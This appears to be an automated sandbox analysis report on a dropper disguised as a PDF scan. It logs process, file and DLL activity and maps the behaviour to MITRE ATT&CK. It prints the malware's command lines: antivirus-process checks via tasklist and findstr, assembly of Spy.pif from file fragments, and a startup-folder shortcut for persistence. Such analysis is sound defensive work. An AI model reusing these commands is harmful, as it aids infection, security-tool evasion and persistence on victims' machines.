Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Section loaded (in load order, repeats kept): apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, wintypes.dll, wintypes.dll, textshaping.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: apphelp.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: version.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: shfolder.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: windows.storage.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: propsys.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: riched20.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: usp10.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: msls31.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: textinputframework.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: coremessaging.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: ntmarta.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: wintypes.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: textshaping.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: profapi.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: edputil.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: urlmon.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: iertutil.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: srvcli.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: sspicli.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: appresolver.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: slc.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: userenv.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: sppc.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pifSection loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\OpenWith.exeWindow detected: Number of UI elements: 13

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif
Source: C:\Program Files\7-Zip\7zFM.exe | File created: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NanoCipher.url
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\7zFM.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\7-Zip\7zFM.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif TID: 3312 | Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif TID: 1640 | Thread sleep count: 68 > 30
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Program Files\7-Zip\7zFM.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\OpenWith.exe | Process created: C:\Program Files\7-Zip\7zFM.exe "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\user\Desktop\#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar"
Source: C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exit
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif | Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exit
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\OpenWith.exe | Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\7zO099FD947\??? ??????? 937463543.txt VolumeInformation
MITRE ATT&CK matrix, one line per tactic (a leading number is the report's hit count for that technique; entries without a number are the matrix's unmatched default cells):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: 1 Windows Management Instrumentation; 1 Command and Scripting Interpreter; At; Cron
Persistence: 1 Scripting; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook
Privilege Escalation: 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook
Defense Evasion: 11 Masquerading; 1 Virtualization/Sandbox Evasion; 11 Process Injection; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: 1 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: 1 Clipboard Data; Data from Removable Media; Data from Network Shared Drive; Input Capture
Command and Control: 1 Non-Application Layer Protocol; 1 Application Layer Protocol; Steganography; Protocol Impersonation
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow. (Screenshot thumbnails are not included in this extract.)

Source | Detection | Scanner | Label | Link
#U0417#U0430#U043f#U0438#U0442 #U0421#U0411#U0423.rar | 3% | ReversingLabs | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\185027\Spy.pif | 5% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\7zO09913F37\scan_doc_zapit_836893.pdf.exe | 8% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
